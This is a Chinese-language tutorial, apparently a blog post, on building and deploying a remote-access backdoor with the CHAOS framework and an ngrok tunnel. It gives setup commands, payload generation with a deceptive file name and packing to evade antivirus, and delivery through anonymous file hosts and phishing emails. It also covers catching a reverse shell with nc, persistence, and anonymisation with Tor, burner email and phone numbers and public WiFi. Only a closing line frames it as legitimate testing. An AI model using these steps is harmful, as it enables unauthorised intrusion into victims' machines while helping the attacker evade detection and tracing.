用鱼竿、鱼钩、鱼饵和彩蛋模拟一次网络渗透
字数 1673 2025-08-18 11:37:11
网络渗透模拟教学:基于CHAOS后门框架的钓鱼攻击
工具准备
1. 主要工具
- CHAOS远程后门:基于Golang的开源后门框架
- GitHub地址:https://github.com/tiagorlampert/CHAOS
- ngrok:内网穿透工具
- 官网:https://ngrok.com/
- 可使用GitHub账号登录注册
2. 辅助工具
- 匿名网络空间:https://www.upload.ee/
- 匿名邮箱服务:
- http://www.yopmail.com/
- https://mytemp.email/
- 临时电话号码服务:
- https://www.textnow.com/signup
- 区号查询:https://www.allareacodes.com/area_code_listings_by_state.htm
环境搭建
1. CHAOS后门安装(Kali Linux)
# 安装依赖
apt install golang upx-ucl -y
# 克隆仓库
git clone https://github.com/tiagorlampert/CHAOS.git
# 进入目录
cd CHAOS
# 运行
go run CHAOS.go
2. ngrok配置
- 注册ngrok账号并获取authtoken
- 在Kali中下载ngrok客户端
- 添加authtoken:
./ngrok authtoken <your_authtoken> - 开启TCP转发:
记下分配的外网地址(如./ngrok tcp 44440.tcp.ngrok.io:19413)
生成后门
- 在CHAOS界面选择选项1(生成payload)
- 输入ngrok提供的外网IP和端口
- 为后门设置具有欺骗性的名称(如
explorer.exe) - 选择加壳选项(增加免杀能力)
部署后门
- 将生成的后门文件通过Tor网络上传到匿名文件共享网站(如upload.ee)
- 获取下载链接
- 通过钓鱼邮件或其他方式诱导目标下载执行
控制目标
- 在CHAOS中启动监听:
nc -lvp 4444 - 当目标执行后门后,将获得shell访问权限
- 可用命令:
- 文件上传/下载
- 打开指定URL
- 添加启动项实现持久化
免杀特性
- CHAOS后门在测试中能绕过360卫士等国内主流杀毒软件
- 即使被扫描发现并清除,仍能保持控制权限
- 全盘扫描后可能显示无毒,但后门仍在运行
高级技巧
1. Word宏利用
GitHub资源:https://github.com/flagellantX/wordexploit/blob/master/coding
2. 浏览器插件攻击
利用HFS+ngrok构建简易网络服务器,诱导目标访问恶意URL自动下载执行后门
GitHub资源:https://github.com/flagellantX/BrowserKiller.git
3. 多目标控制
- 为不同目标生成监听不同端口的后门
- 例如:目标A监听4444端口,目标B监听5555端口
匿名化技巧
- 使用Tor浏览器访问敏感服务
- 通过公共网络环境操作(无监控的公共WiFi、网吧等)
- 使用Live系统(如ParrotSec)避免留下痕迹
- 硬盘加密处理
渗透测试环境推荐
- 虚拟化平台:
- VMware:https://www.vmware.com/products/workstation-pro.html
- VirtualBox:https://www.virtualbox.org/wiki/Downloads
- 渗透测试系统:
- Kali Linux:https://www.kali.org/downloads/
- 漏洞测试环境:
- DVWA/Metasploitable:https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
- bWAPP:https://www.vulnhub.com/entry/bwapp-bee-box-v16,53/
- Windows测试环境:
- Windows 10下载:https://www.microsoft.com/en-us/software-download/windows10
注意事项
- 钓鱼链接应使用URL缩短服务或结合XSS技术进行伪装
- 为保持会话,可将Kali系统挂起而非关闭
- 法律风险提示:本教学仅用于合法渗透测试和安全研究,未经授权对他人系统进行测试属违法行为